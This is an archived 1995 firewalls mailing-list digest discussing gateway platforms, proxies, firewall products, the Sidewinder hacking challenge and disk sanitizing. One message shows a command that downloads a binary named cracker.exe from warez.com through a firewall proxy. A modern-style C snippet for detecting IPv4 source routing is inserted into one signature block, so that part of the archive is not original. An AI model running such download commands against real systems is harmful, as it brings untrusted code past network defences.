>discussion list (INFSEC-L) open for all info security professionals, and
>for discussion on issues/trends related to info security. To subscribe,
>send subscription message to LISTSERV@ETSUADMN.ETSU.EDU. Thanks!

Kelly Newcomb, CISSP
Security/Email Administrator
Texas Guaranteed Student Loan Corp.
Internet: kelly.newcomb@tgslc.org
Opinions: Mine, not TGSLC's.

From firewalls-owner Wed Aug 9 08:06:33 1995
Message-Id: <8k_AHFr6_EEC0YCrk0@ovid>
Date: Wed, 9 Aug 1995 10:23:13 -0400 (EDT)
From: Steve Gaarder
To: firewalls@GreatCircle.COM
Subject: SunOS vs Solaris 2 vs Intel/BSD for firewalls

I'm planning to build a dual-homed gateway using TIS's toolkit. I have two choices for hardware platform: a Sparcstation 2 running SunOS 4 or Solaris 2 or an Intel box running BSD.
BSD has the drawback that I'm not familiar with it; SunOS 4 has the drawback that source routing is impossible (or just hard?) to disable; Solaris 2 has relatively few packages ported to it. Which do you think is best for this application?

thanks,
Steven Gaarder
Network and Systems Administrator
gaarder@actech.com
A C Technology, Ithaca, N.Y., USA

From firewalls-owner Wed Aug 9 08:35:25 1995
From: hoogervorst-6904be01@technet.iaf.nl
Message-Id: <9508091612.0MRRY00@technet.iaf.nl>
Date: Wed, 09 Aug 95 16:12:34
Subject: RE: IP trans
To: firewalls@greatcircle.com

.>fpmw> NTMK. I have the manual and if it's possible it's an undocumented 'feature'.
.>fpmw> msk
.>fpmw> >Is there anybody who knows if the Firewall-1 (release 1.2.1) can do
.>fpmw> >IP-translation. That means it can remap the internal networks' IPs to
.>fpmw> >the Firewall's IP.
.> Or can it translate certain IP-addresses into IP-addresses from a
.> pre-defined list? So, logical links are maintained between two
.> `virtual' hosts?
.> frank

As far as I understand from our Firewall-1 supplier it can dynamically assign internal IP-addresses to external (firewall-) IP-addresses.

Frank

Frank Hoogervorst
KLPD/IT-organisatie
Driebergen, The Netherlands
work: hoogervorst-6904be01@technet.iaf.nl
priv: fhvorst@pi.net
<< Disclaimer: All opinions .. etc. >>

From firewalls-owner Wed Aug 9 08:42:35 1995
From: peter@nmti.com (Peter da Silva)
Message-Id: <9508091412.AA03231@sonic.nmti.com.nmti.com>
Subject: Re: WWW through firewalls
To: hdunn1@csc.com (Patrick Dunn)
Date: Wed, 9 Aug 1995 09:12:29 -0500 (CDT)
Cc: Firewalls@GreatCircle.COM
In-Reply-To: from "Patrick Dunn" at Aug 8, 95 07:37:00 pm

> I cannot speak (write) to other architectures, but, on UNIX-flavored machines
> you can "encapsulate" your application by using the chroot(1) program
> (or chdir[2]/fchdir[2] system call followed by a chroot[2]/fchroot[2] system
> a directory subtree dedicated to that purpose.
> By doing this, you ensure that data (including binaries) downloaded from the
> net will not have access to anything on your file system "above" the specified
> "root" directory.

Do you mean that the *firewall proxy* will run chrooted, or the client software?

> The downside to this is that you will have to place your "viewer"
> applications

Oh, the client software. That doesn't help his problem. It's orthogonal to the issue of the firewall. Why?

    % echo "GET http://warez.com/cracker.exe" | telnet firewall 80 > cracker.exe

That's a client program. And because of the way internet domain sockets work, once they manage to run a general program on your system they're inside your firewall.

UNIX security would be a lot better if the Chaosnet interface had been standardized on, with all net activity going through the file system. Our OpenNET software on Xenix did that, and you could really build a chrooted jail there.

From firewalls-owner Wed Aug 9 09:00:47 1995
Date: Wed, 9 Aug 95 08:25:02 PDT
Message-Id: <9508091525.AA01371@snd10.med.navy.mil>
To: firewalls@greatcircle.com
From: snd1pmf@snd10.med.navy.mil (Patrick M. Flaherty)
Subject: SAMPLE SECURITY POLICY

I've been tasked with writing a Network Security Policy for our organization.
If anyone would be kind enough to share a copy of their policy I would much appreciate it. Please mail me directly. Thanks in advance.

Pat Flaherty
Network Manager
Naval Medical Center San Diego
snd1pmf@snd10.med.navy.mil

From firewalls-owner Wed Aug 9 09:56:34 1995
From: F.Wetzels@amc.uva.nl
Date: Wed, 09 Aug 1995 17:50:39 +0200
Subject: Proxy service on solaris with 2 IP-addresses on one interface
To: firewalls@greatcircle.com
Message-id: <9508091550.AA07157@amchelix.amc.uva.nl>

Hi,

I have the following problem. We have two hosts in a secure net. Not everybody is allowed to telnet to these hosts. For each host one should be allowed to telnet to. To guide the IP-traffic through a proxy-server transparently, one can define two IP-addresses on the bastion (solaris 2.x) that represent the two hosts. So, direct traffic between public hosts and secure hosts will not occur. Validation of the IP-address will take place on the bastion. But the validation depends also on to *which* host (or which IP-address on the bastion) one wants to telnet.
Is there any possibility to reveal to which address a client telnets? So, a choice can be made to telnet to the proper host.

Frank

F.P.M. Wetzels, ADIV/CNS D01-319.1, wetzels@amc.uva.nl
meibergdreef 15, 1105 AZ Amsterdam-ZO
Voice +31 20 5662916, Fax +31 20 6973181

From firewalls-owner Wed Aug 9 10:00:42 1995
From: emp547@wwa.com (Eric Westburg)
Subject: Firewall Eval - Request Comments
To: firewalls-digest@GreatCircle.com
Date: Wed, 9 Aug 1995 10:45:58 -0500 (CDT)
Cc: emp547@wwa.com (Eric Westburg)

I have researched (read security materials and vendor information) firewalls for my organization. I investigated the following eight products: BorderWare, CyberGuard, Eagle, Firewall-1, Gauntlet, NetSP SNG, SEAL, and Sidewinder. The following is the information that I collected during this research. Please correct me if I misstate a product's features or if I have missed some important point. I am looking for feedback on my conclusions.

IMHO some of the more important features that are not common to all firewalls seem to be: Real-time Intruder Detection, Dual DNSs, & partitioned Unix Kernel (Services isolated from each other).
It appears that NetSP SNG, SEAL, and Gauntlet do not have real-time intruder detection. It appears that CyberGuard and Firewall-1 do not support dual DNSs, or at least do not hide the internal addresses on e-mail. All of the above and Eagle do not have a partitioned Unix kernel.

These conclusions would lead me to recommend the following firewalls (only looking at security - not platform, cost, etc.):

1) Sidewinder or BorderWare
3) Eagle

I am looking for feedback on my information and my "draft" recommendations.

1) Did I miss a feature on a firewall, thus eliminating it from the final running?
2) On DEC's Webpage they are reselling BorderWare as an entry-level firewall; why is it considered an entry-level firewall?
3) Can anyone compare and contrast BorderWare to Sidewinder? What are the pros and cons of each?

I am looking forward to your responses.

Eric Westburg
Senior Security Analyst
emp547@wwa.com

From firewalls-owner Wed Aug 9 10:26:37 1995
From: "CASSIDY MEYER"
Organization: Western Cape Scientific Services
To: Frederick M Avolio
Date: Tue, 8 Aug 1995 14:18:07 +0200
Subject: Re: iWay-One
CC: firewalls@greatcircle.com
Message-ID: <4CB531EA@cncjnk.wcape.gov.za>

>From: Frederick M Avolio
>To: CASSIDY MEYER
>Cc: firewalls@greatcircle.com
>Subject: Re: iWay-One
>Date: Tue, 08 Aug 95 07:58:57 -0400
>
>There was going to be an Internet Firewalls Symposium, to be held in
>Dallas. But when all of the vendors who had a firewall registered, it
>was found that there was no room left in Dallas hotels for attendees.
>
>I am joking.
>
>f

funny

From firewalls-owner Wed Aug 9 10:30:08 1995
Date: Wed, 9 Aug 1995 09:11:55 -0700
From: Brad.Powell@Eng.Sun.COM (Brad Powell)
Message-Id: <9508091611.AA08241@olympics.>
To: firewalls@GreatCircle.COM, gaarder@actech.com
Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls

>From firewalls-owner@GreatCircle.COM Wed Aug 9 08:24:41 1995
>Subject: SunOS vs Solaris 2 vs Intel/BSD for firewalls
>
>I'm planning to build a dual-homed gateway using TIS's toolkit. I have
>two choices for hardware platform: a Sparcstation 2 running SunOS 4 or
>Solaris 2 or an Intel box running BSD.

All have gotchas that can be avoided :-)

>BSD has the drawback that I'm
>not familiar with it;

That is a tough one to fix then. Go with something you know inside and out.
BSD *does* have an advantage of having source code without paying for the source license.

>SunOS 4 has the drawback that source routing is
>impossible (or just hard?) to disable;

Not at all. I posted a hacked-up version that added a kernel flag to block/drop ip_source_route. It's in the Firewalls archives as well as many ftp/http sites. Try ftp.greatcircle.com:/pub/firewalls/digest or http://all.net

>Solaris 2 has relatively few
>packages ported to it.

Sometimes this is an advantage since the break-in tools are not ported either ;^)

>
>Which do you think is best for this application?
>

Any of the above can be configured to be a strong firewall. It depends on what services you want to offer as to which is best. How about a little more detail?

=======================================================================
Brad Powell : brad.powell@Sun.COM
Sr. Network Security Consultant
SunNetworks, Sun Microsystems Inc.
=======================================================================
The views expressed are those of the author and may not reflect the views of Sun Microsystems Inc.
=======================================================================

From firewalls-owner Wed Aug 9 11:32:43 1995
Message-ID: <01BA663D.0063F920@tom>
From: Tom Huseby
To: "'Firewalls'"
Subject: Morning Star Secure Connect Routers
Date: Wed, 9 Aug 1995 09:46:21 -0700

Can anybody vouch for the reliability of Morning Star Secure Connect Routers?
Tom
tom@percon.com

From firewalls-owner Wed Aug 9 12:08:31 1995
From: David Kovar
Message-Id: <199508091658.MAA02175@nda.nda.com>
Subject: Re: sleazewinder
To: hobbit@avian.org (*Hobbit*)
Date: Wed, 9 Aug 1995 12:58:41 -0400 (EDT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <199508090414.AAA07814@narq.avian.org> from "*Hobbit*" at Aug 9, 95 00:14:31 am

> CONCERN 3. Is the Challenge a serious learning tool or a Marketing tactic?
> The answer is both.
>
> The answer so far is "marketing tactic" from the standpoint of "out here on
> the net", unless you intend to do something about it. Where are your RESULTS??
> Where is OUR benefit from all the free work that the community at large has
> given you?

The only result of this that I've seen so far is at a trade show the other week. At their booth they were announcing something like:

  Hackers: 0%
  Sidewinder: 100%

  Sidewinder stopped every single one of the best hackers' efforts!
-David

From firewalls-owner Wed Aug 9 12:09:33 1995
Date: 09 Aug 95 13:39:25 EDT
From: Tammy Oreglia
Subject: Newbie Question.. Alert Alert
Message-ID: <950809173925_555063.0_EHF83-1@CompuServe.COM>

Hi all:

I have been working on setting up internet access for my company and have received a few quotes from service providers. The following is a configuration that we are considering:

  56Kbps line
  Morningstar MST-SC3003 Router with CSU/DSU

My question is - does the Morningstar router have sufficient security, or should we consider a firewall as well? We are planning on using this connection for email, web browsing, 3270 emulation (using Wollongong's TN3270) etc., and eventually plan on setting up an FTP server. Oh, BTW, we currently have a Novell network (routing IPX only).

Any feedback would be appreciated. Thank you for your consideration.
Tammy Oreglia
Systems Manager
Osborne/McGraw-Hill
email: toreglia@osborne.mhs.compuserve.com

From firewalls-owner Wed Aug 9 12:18:14 1995
Date: Wed, 9 Aug 95 14:11:51 EDT
From: steveg@cseic.saic.com (Stephen Harold Goldstein)
Message-Id: <9508091811.AA19205@cseic.saic.com>
To: gaarder@actech.com
Cc: firewalls@GreatCircle.COM
In-Reply-To: <8k_AHFr6_EEC0YCrk0@ovid> (message from Steve Gaarder on Wed, 9 Aug 1995 10:23:13 -0400 (EDT))
Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls

Steve Gaarder writes:

>I'm planning to build a dual-homed gateway using TIS's toolkit. I have
>two choices for hardware platform: a Sparcstation 2 running SunOS 4 or
>Solaris 2 or an Intel box running BSD. BSD has the drawback that I'm
>not familiar with it; SunOS 4 has the drawback that source routing is
>impossible (or just hard?) to disable; Solaris 2 has relatively few
>packages ported to it.
>
>Which do you think is best for this application?

My vote (with 1 reservation - see below) would be for BSD for at least two reasons:

1) Its chflags command, which can set files as append-only (sappnd) or "immutable" (schg). With these additional features prudently applied to critical files, even if root were compromised, the intruder would be unable to (a) erase any logs that tracked his actions, (b) replace things like /bin/login with a hacked version, etc.
2) In the warm and fuzzy department, it's been used as the base for at least two reasonably respected commercial firewalls - TIS and Borderware (though I believe each has performed their own "hardening" of the kernel).

As for (1), in theory these flags can only be changed when the box is in single-user mode, but the man page for chflags seems to imply there may be another way:

  "If either or both of sappnd or schg is set, however, not even the
  super-user can change the flags unless the system is in ``insecure''
  mode (typically, single user). The user flags can be set by the owner
  or the super-user; the system flags can only be set by the super-user."

Anyone know of a way an intruder might induce "insecure" mode while in multi-user mode?

From firewalls-owner Wed Aug 9 12:35:54 1995
Date: Wed, 9 Aug 1995 21:13:26 +0200
Message-Id: <199508091913.VAA11662@utrecht.knoware.nl>
To: "Crandall, John"
From: njb@knoware.nl (Niels Bjergstrom)
Subject: Re: InfoSec policies made easy? - YES!!
Cc: firewalls@greatcircle.com

>
>I missed the beginning of this thread, can someone provide me more
>information on Cresson's book?

The best way to get more info about Charles Cresson's books and other things, I think, would be to contact info@baselinesoft.com

Recommended!
Niels

------------------------------------------------------------------------
-- Niels J Bjergstrom, Ph.D., m/ISACA        Tel. +31 70 362 2269       --
-- Computer Security Engineers, Ltd.         Fax. +31 70 365 2286       --
-- Postbus 85 502, NL-2508 CE Den Haag       London: +44 181 519 8011   --
-- Netherlands                               Email: njb@csehost.knoware.nl --
-- PGP Public key available on request - please use when mailing vira   --
------------------------------------------------------------------------

From firewalls-owner Wed Aug 9 13:00:47 1995
Message-Id: <9508091919.AA18913@tis.com>
From: Frederick M Avolio
X-Organization: Trusted Information Systems, Inc.
X-Phone: +1 301 854 6889, +1 410 442 1673, FAX: +1 301 854 5363
To: David Kovar
Cc: *Hobbit* , firewalls@greatcircle.com
Subject: Re: sleazewinder
In-Reply-To: Your message of Wed, 09 Aug 95 12:58:41 -0400. <199508091658.MAA02175@nda.nda.com>
Date: Wed, 09 Aug 95 15:19:58 -0400

> > Where is OUR benefit from all the free work that the community at large has
> > given you?

Well... You can look at it sort of like being a field test site. What are the benefits? I mean, no one pays you to be a field test site for a product.
You can figure that the benefits are the same as if you were a test site: the Sidewinder product gets better and you have a better product to choose from when you go shopping for a firewall.

I am not arguing in favor of you buying Sidewinder, nor do I want any of this article quoted out of context on their home page. :-)

Fred
Gauntlet Product Manager, etc.

From firewalls-owner Wed Aug 9 13:24:50 1995
From: Pete Anning
To: firewalls-owner , lyndond
Cc: firewalls
Subject: Re: Encripted ftp connections
Date: Wed, 09 Aug 95 20:20:00 gmt
Message-Id: <30291831@pc2520.tct.crosfield.co.uk>

I also need to set up a VPN; any info/pointers to discussions or products etc. would be very useful. I have just joined the mailing list so I don't have historical discussions from this group.

p

----------
>From: firewalls-owner
>To: lyndond
>Cc: firewalls
>Subject: Re: Encripted ftp connections
>Date: 07 August 1995 16:29
>
>from the quill of Lyndon David on scroll
><199508072134.WAA04815@server.sentinet.demon.co.uk>
>
>> Dear All,
>>
>> I have been tasked with setting up an ftp server to
>> communicate with a handful of business partners. We
>> wish to have the ability for our partners to be able
>> to send and retrieve files from our server.
>> Due to the
>> nature of the data the data must be encrypted as it passes
>> over the Internet and strong authentication must be used
>> when they connect.
>
>You want a VPN (Virtual Private Network). Look through the archives, as
>there have been plenty of pointers in the last week to products that do VPN.
>As well as lots of discussion in the past, I'm sure.
>
>> This is a commercial project and the data will cross
>> international boundaries; for this reason I do not want
>> to use encryption technology such as pgp as some of the
>> countries will have problems with this.
>
>This is going to bite whether you pre-encrypt, or encrypt in the data
>stream.
>
>b.
>--
>Brian J. Murrell                         brian@ilinx.com
>InterLinx Support Services, Inc.         brian@wimsey.com
>North Vancouver, B.C.                    604 983 UNIX
>    Platform and Brand Independent UNIX Support - R3.2 - R4 - BSD

From firewalls-owner Wed Aug 9 13:30:18 1995
Date: Wed, 9 Aug 1995 16:01:04 -0400
Message-Id: <199508092001.QAA19028@mail1.uac.net>
From: Michael
To: kovar@NDA.COM
CC: hobbit@avian.org, firewalls@GreatCircle.COM
In-reply-to: <199508091658.MAA02175@nda.nda.com> (message from David Kovar on Wed, 9 Aug 1995 12:58:41 -0400 (EDT))
Subject: Re: sleazewinder

> The only result of this that I've seen so far is at a trade show the
> other week.
> At their booth they were announcing something like:
>
> Hackers: 0%
> Sidewinder: 100%

It's interesting that they only chose to use one digit of precision in their results. There was a message in February or March on the mailing list for Sidewinder attackers that announced someone did meet the challenge and break into the second machine. They had added some code to telnet, but I don't remember offhand exactly what it did. I suppose, though, that 1 out of 10000 is 0%; however, it's very misleading, especially if:

> Sidewinder stopped every single one of the best hackers' efforts!

was announced at the booth.

--Michael

From firewalls-owner Wed Aug 9 13:48:39 1995
Date: Wed, 9 Aug 1995 19:32:53 GMT
From: bret@real.com (Bret McDanel)
Message-Id: <199508091932.TAA05591@real.com>
To: firewalls@greatcircle.com
Subject: Re: sleazewinder

> > CONCERN 3. Is the Challenge a serious learning tool or a Marketing tactic?
> > The answer is both.
> >
> > The answer so far is "marketing tactic" from the standpoint of "out here on
> > the net", unless you intend to do something about it. Where are your RESULTS??
> > Where is OUR benefit from all the free work that the community at large has
> > given you?
>
> The only result of this that I've seen so far is at a trade show the
> other week.
> At their booth they were announcing something like:
>
> Hackers: 0%
> Sidewinder: 100%
>
> Sidewinder stopped every single one of the best hackers' efforts!

Not to be picky, but didn't Sidewinder stop the hackers' best efforts? A big distinction could be made by the order of the words. You imply that the best hackers cannot get in, and I do not think that is true, only those that tried (and then how hard did they try?).

Anyway :)

From firewalls-owner Wed Aug 9 14:05:03 1995
Date: Wed, 9 Aug 1995 12:53:17 -0700
From: Brad.Powell@Eng.Sun.COM (Brad Powell)
Message-Id: <199508091953.MAA00574@olympics.Eng.Sun.COM>
To: firewalls@GreatCircle.COM, gaarder@actech.com
Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls

>From firewalls-owner@GreatCircle.COM Wed Aug 9 08:24:41 1995
>Subject: SunOS vs Solaris 2 vs Intel/BSD for firewalls
>
>I'm planning to build a dual-homed gateway using TIS's toolkit. I have
>two choices for hardware platform: a Sparcstation 2 running SunOS 4 or
>Solaris 2 or an Intel box running BSD.

All of them have gotchas that can be avoided.

>BSD has the drawback that I'm
>not familiar with it;

Don't use anything you are not familiar with.
BSD *does* have an advantage of having source code available without having to pay for it. Of course the downside is support isn't there.

>SunOS 4 has the drawback that source routing is
>impossible (or just hard?) to disable;

Nonsense. I posted a set of kernel modules to do just this to this list. Check out the archives at ftp.greatcircle.com:/pub/firewalls/digest. If you can't find them there try http://all.net. If you can't find them after that then I'll send you a copy (I'm sure I have it somewhere in the backups).

>Solaris 2 has relatively few
>packages ported to it.

This can be a boon as well as a bane since the cracking tools are also not ported (yet) ;^)

=======================================================================
Brad Powell : brad.powell@Sun.COM
Sr. Network Security Consultant
SunNetworks, Sun Microsystems Inc.
=======================================================================
The views expressed are those of the author and may not reflect the views of Sun Microsystems Inc.
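Brad Powell's answer here (and his earlier, near-identical reply above) is a kernel flag that drops source-routed datagrams instead of honouring the route they carry. The decision such a flag gates is a walk over the IPv4 options field looking for the loose (LSRR, option type 131) and strict (SSRR, option type 137) source route options defined in RFC 791. The function below is an added example written for this digest; it is not Brad's posted module and not code from SunOS, Solaris or BSD. It parses a raw IPv4 header from a byte buffer, reports whether the datagram carries a source route, and treats a malformed option list as something a filter should also drop rather than guess about. The three packets are constructed samples with made-up addresses.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* IPv4 option type bytes from RFC 791: loose source route (copied
 * bit 1, class 0, number 3 = 131) and strict source route (number 9 = 137). */
#define OPT_EOL  0     /* end of option list */
#define OPT_NOP  1     /* one-byte padding, no length field */
#define OPT_LSRR 131
#define OPT_SSRR 137

/* Return 1 if the IPv4 datagram in pkt carries an LSRR or SSRR option,
 * 0 if it does not, and -1 if the header or option list is malformed.
 * A filter that drops source-routed packets should drop -1 as well. */
int has_source_route(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4)
        return -1;                               /* not a complete IPv4 header */
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;    /* header length in bytes */
    if (ihl < 20 || ihl > len)
        return -1;                               /* IHL inconsistent with buffer */

    size_t i = 20;                               /* options start after the fixed header */
    while (i < ihl) {
        uint8_t type = pkt[i];
        if (type == OPT_EOL)
            break;
        if (type == OPT_NOP) {
            i++;
            continue;
        }
        if (i + 1 >= ihl)
            return -1;                           /* length byte missing */
        uint8_t optlen = pkt[i + 1];
        if (optlen < 2 || i + optlen > ihl)
            return -1;                           /* option overruns the header */
        if (type == OPT_LSRR || type == OPT_SSRR)
            return 1;
        i += optlen;                             /* skip any other option */
    }
    return 0;
}

/* Constructed sample: plain 20-byte IPv4 header, no options (IHL = 5),
 * 10.0.0.1 -> 10.0.0.2, protocol TCP. */
static const uint8_t plain_pkt[20] = {
    0x45, 0x00, 0x00, 0x14, 0x00, 0x01, 0x00, 0x00,
    0x40, 0x06, 0x00, 0x00,
    10, 0, 0, 1,
    10, 0, 0, 2
};

/* Constructed sample: same header plus a 7-byte LSRR option naming one
 * hop (192.0.2.1), padded with EOL to a 32-byte header (IHL = 8). */
static const uint8_t lsrr_pkt[32] = {
    0x48, 0x00, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00,
    0x40, 0x06, 0x00, 0x00,
    10, 0, 0, 1,
    10, 0, 0, 2,
    OPT_LSRR, 7, 4, 192, 0, 2, 1,                /* type, length, pointer, hop */
    OPT_EOL, 0, 0, 0, 0
};

/* Constructed sample: 24-byte header (IHL = 6) whose LSRR option claims
 * a length of 20, which runs past the end of the header. */
static const uint8_t bad_pkt[24] = {
    0x46, 0x00, 0x00, 0x18, 0x00, 0x01, 0x00, 0x00,
    0x40, 0x06, 0x00, 0x00,
    10, 0, 0, 1,
    10, 0, 0, 2,
    OPT_LSRR, 20, 4, 0
};

int main(void)
{
    printf("plain: %d\n", has_source_route(plain_pkt, sizeof plain_pkt)); /* 0 */
    printf("lsrr:  %d\n", has_source_route(lsrr_pkt, sizeof lsrr_pkt));   /* 1 */
    printf("bad:   %d\n", has_source_route(bad_pkt, sizeof bad_pkt));     /* -1 */
    return 0;
}
```

The check returns three states on purpose: an in-kernel flag of the kind Brad describes only needs "drop or pass", but keeping the malformed case separate lets a filter log truncated or inconsistent option lists distinctly from genuine source-route attempts.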
=======================================================================

From firewalls-owner Wed Aug 9 14:06:07 1995
Date: Wed, 9 Aug 1995 15:16:51 -0500
From: Rick Smith
Message-Id: <199508092016.PAA26323@shade.sctc.com>
To: firewalls@greatcircle.com
Cc: smith@sctc.com
Subject: Sidewinder challenge comments

Regarding the posting by Hobbit...

>[Referencing dan thomsen's msg from about a week ago, wherein he says...]
>
> As a result we get to learn what kind of attacks people are using
> against Unix systems. More importantly this shows that type enforcement
> is a useful tool in preventing system compromises.
>
>Yes, and if I remember right, back when the challenge was issued and people
>finally figured out what was going on, it was pointed out that if SCTC was
>going to let the net test their product for them, they owed the results of
>said testing back to the net.
>I believe someone else from SCTC agreed with
>this, claiming that the megabytes of raw log would soon be boiled down into
>some sort of useful report.

Dan may be replying himself, but in the meantime I'll comment.

Short answer: look for Dan's paper on this at CSAC in New Orleans.

There really haven't been that many attacks that are interesting from a Firewalls standpoint. To paraphrase the Sidewinder FAQ, about 1% of the attacks are really interesting, and most of those appear to come from BSDI wizards probing our Type Enforcement implementation. Maybe 10% are competent but predictable attacks based on known weaknesses like those published by Cheswick & Bellovin. The rest are people who try the easier things mentioned in C&B's "bombs" or in "Unix for Dummies."

Rick.
smith@sctc.com
secure computing corporation

From firewalls-owner Wed Aug 9 14:07:08 1995
From: "Tucker, R., SrA, 28CS/SCSNS"
To: "'firewalls-owner'"
Subject: Sanitizing SCSI HDs
Date: Wed, 09 Aug 95 14:17:00 PDT
Message-Id: <302925F4@cs28-1.ellsworth.af.mil>

Ok folks, I guess it's time to fess up so I can take my foot out of my mouth now. :*)

As far as sanitizing SCSI drives using Norton Utilities' Wipedisk:
It *IS* still approved for TS, but on MS-DOS systems on ***MILITARY COMPUTERS ONLY.*** If you're a civilian contractor, there are different guidelines you have to follow, and they don't have provisions for clearing TS off of your systems. However, this has nothing to do with hardware and being able to pull information back up from the system, and everything to do with administrative procedures BEFORE you need to sanitize.

The sloppy drive head positioning deals with floppy drives, and there is NO WAY, barring destruction, to declassify a floppy disk. However, HDs, unless the head slips (and you would know when it fails), can be declassified in this manner. This includes taking into consideration taking the platters apart; once overwritten enough times, the information is gone. (However, it's also been my past experience that sooner or later, someone will invent something that will nullify this statement, since whenever someone says, "It can't be done," there's always someone doing it.)

I know this means there's a double standard between military and civilian requirements, but please don't flame me for it. :*) Part of the problem is ISM and NISPOM are both Industrial Security program documents. While they DO APPLY, they do not necessarily apply as far as Computer Security is concerned... but you still have to follow them. This is what's known as bureaucracy and politics at work. Industrial Security is governed at the national level by former Security Police (SP) personnel, who haven't got a clue as to computer requirements. (I think it's a prerequisite for running ANY national level program, however, so I'm not trying to flame them.) Since they have no jurisdiction in computer requirements, the only changes they can make to national computer security mandates is to make them more stringent. (You can legally add to a requirement, but you can't make them less stringent without a waiver from the responsible office.)
In short, if you're a civilian with classified on your computer, you have to abide by the NISPOM. Government and military personnel get to use the computer security guidelines. < Neah, neah, neah. :*P >

Also, Wipedisk is only approved for MS-DOS systems; we have nothing approved for any other system for any level of classified, besides utilizing a sledgehammer and sandpaper. (Which, cost notwithstanding, is very fun... you should try it sometime.) Because the discussion was SCSI, I assumed (along with the results of assuming, with an emphasis on the *me* portion) that everyone was talking about MS-DOS, even knowing that almost all of you are using Unix based systems. (Kind of the equivalent of describing the new Wonder Zap! flea collar at a dog show, and forgetting to mention it only works on cats.) :*(

And, last but not least, because I've been shown *VERY* wrong on this one, *DO NOT* degauss a hard drive unless you know, or know someone who knows, what the heck you are doing! This is in regards to zapping your servo info with HDs using voice coil heads. I've spoken to my computer maintenance folks, and they said it's very likely, but they weren't sure (understandable, since we don't normally degauss our HDs). However, I would like to point out that I do know someone who has done it and survived, but he retired and moved recently, so I won't be able to contact him to find out how he did it until this thread is forgotten. I wish I could provide technical details on this one (esp. since this is a technical list) but I'm not too knowledgeable on technical matters (I just play one on TV :*) ), but until I find out how he did it, please don't follow my advice by degaussing your HD. Mr. Lymn has stated that maybe he (my friend who zapped his HD) got lucky, or something, but like I said, unless you know someone who can rebuild HDs from scratch, please don't try this one at home... just in case.

So, to stop wasting any more bandwidth than I have to...

1. Wipedisk is ONLY for government and military computers, and only for MS-DOS systems (but it *IS* for TS).
2. Civilians play by a different set of rules (with extra requirements) for the same information.
3. Mr. Lymn is technically knowledgeable, I'm not. Don't degauss your hard drive unless you're a masochist. (Or a sadist who hates his/her computer maintenance folks.)

Thanks for all the help in pointing out my mistakes, and I apologize for the misinformation I presented in my original post. (No, I'm not being smart... if people don't point out my mistakes, I can't learn. Once learning stops, it's time to take me out back and shoot me.)

Thanks,
Robert C. Tucker

From firewalls-owner Wed Aug 9 14:08:14 1995
Message-Id: <199508092045.UAA05832@real.com>
Date: Wed, 09 Aug 95 16:45:51 -0400
From: Fred Flintstone
To: firewalls@greatcircle.com
Subject: Re: sleazewinder

> > > Sidewinder stopped every single one of the best hackers' efforts!
> >
> > was announced at the booth.
> >
> >
> > --Michael
>

I think that they were referring to DEFCON only.. And there was more than the person that did stuff with the telnet code (actually it worked on any socket operation if I remember, but that was fixed that day)..
From firewalls-owner Wed Aug 9 15:05:34 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA18493 for firewalls-outgoing; Wed, 9 Aug 1995 14:51:25 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA18431 for ; Wed, 9 Aug 1995 14:51:16 -0700
From: long-morrow@CS.YALE.EDU
Received: from rt-gw.cs.yale.edu(128.36.0.13) by miles via smap (V1.3) id sma018418; Wed Aug 9 14:51:00 1995
Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU via ESMTP; Wed, 9 Aug 1995 17:49:26 -0400
Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.6.12/res.client.cf-3.7) id RAA04230; Wed, 9 Aug 1995 17:49:21 -0400
Date: Wed, 9 Aug 1995 17:49:21 -0400
Message-Id: <199508092149.RAA04230@SPARKY.CF.CS.YALE.EDU>
To: kovar@NDA.COM, mike@uac.net
Subject: Re: sleazewinder
Cc: firewalls@GreatCircle.COM, hobbit@avian.org
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Michael -

There has never been a message about anyone breaking into the target LAN via the Sidewinder demo Internet gateway machine on the Sneakers mailing list. I checked all of the messages on the Sneakers mailing list (an independent and full disclosure list where you can talk about testing breaking into Sidewinder -- and other network security defenses if you wish) and there was no such message in the archives (it wasn't hard to check the archives since the list is fairly low traffic).

You may have heard that 'root' was broken on the Sidewinder demo machine -- and SCTC freely admit that that has happened... but breaking 'root' on their Type Enforcement machine doesn't give you access to the internal network protected by the Sidewinder machine.

Disclaimer: I am not associated with SCTC or the Sidewinder product. I just maintain an independent e-mailing list (called Sneakers) for people who want/need to audit/test/break-into firewalls (for legitimate reasons).
- Morrow

Michael wrote:
>It's interesting that they only chose to use one digit of precision in
>their results. There was a message in February or March on the mailing
>list for sidewinder attackers that announced someone did meet the
>challenge and break into the second machine. They had added some code
>to telnet, but I don't remember offhand exactly what it did. I suppose
>though that 1 out of 10000 is 0%; however, it's very misleading,
>especially if:
>
>> Sidewinder stopped every single one of the best hackers efforts!
>
>was announced at the booth.
>
>
> --Michael

From firewalls-owner Wed Aug 9 15:30:23 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA20550 for firewalls-outgoing; Wed, 9 Aug 1995 15:25:06 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA20527 for ; Wed, 9 Aug 1995 15:25:02 -0700
Received: from abel.cc.sunysb.edu(129.49.2.201) by miles via smap (V1.3) id sma020522; Wed Aug 9 15:24:57 1995
Received: from libws4.ic.sunysb.edu (libws4 [129.49.12.89]) by abel.ic.sunysb.edu (8.6.12/8.6.12) with ESMTP id SAA19590; Wed, 9 Aug 1995 18:10:39 -0400
Received: (sylhwang@localhost) by libws4.ic.sunysb.edu (8.6.9/8.6.9) id SAA13069; Wed, 9 Aug 1995 18:16:15 -0400
Date: Wed, 9 Aug 1995 18:16:13 -0400 (EDT)
From: Atreides
To: Doug Hughes
cc: dannyc@gmap.leeds.ac.uk, firewalls@GreatCircle.COM
Subject: Re: klaxon
In-Reply-To:
Message-ID:
MIME-Version: 1.0
